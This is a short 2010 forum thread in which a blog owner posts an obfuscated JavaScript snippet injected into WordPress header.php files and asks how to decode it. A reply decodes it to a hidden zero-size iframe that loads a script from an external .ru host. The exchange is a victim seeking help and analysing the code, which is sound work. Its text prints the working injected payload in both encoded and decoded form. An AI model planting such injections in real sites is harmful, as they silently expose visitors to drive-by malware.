javascript injection on header.php

Discussion in 'Blogging' started by stream, Jul 8, 2010.

  1. stream

    stream Registered Member

    Joined:
    Apr 7, 2009
    Messages:
    51
    Likes Received:
    4
    hey guys,

    i got an JS injection on some of my blogs.
    maybe my wp was too outdated and the attacker could inject the code. the injection reads like this:

    Code:
    <script type="text/javascript">var _0x260c=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x32\x2E\x73\x70\x62\x2E\x72\x75\x2F\x73\x63\x72\x69\x70\x74\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];document[_0x260c[0x1]](_0x260c[0x0]);</script>
    how can i decode it?
     
  2. yeahright

    yeahright Registered Member

    Joined:
    Jan 17, 2009
    Messages:
    93
    Likes Received:
    32
    It decodes to:
    HTML:
    <iframe src="http://ad2.spb.ru/script/in.cgi?default" width="0" height="0" frameborder="0"></iframe>
    Just use something like firebug for firefox or chrome's built in developer tools to see what the javascript outputs.
     
    • Thanks Thanks x 1
  3. stream

    stream Registered Member

    Joined:
    Apr 7, 2009
    Messages:
    51
    Likes Received:
    4
    thanks yeahright!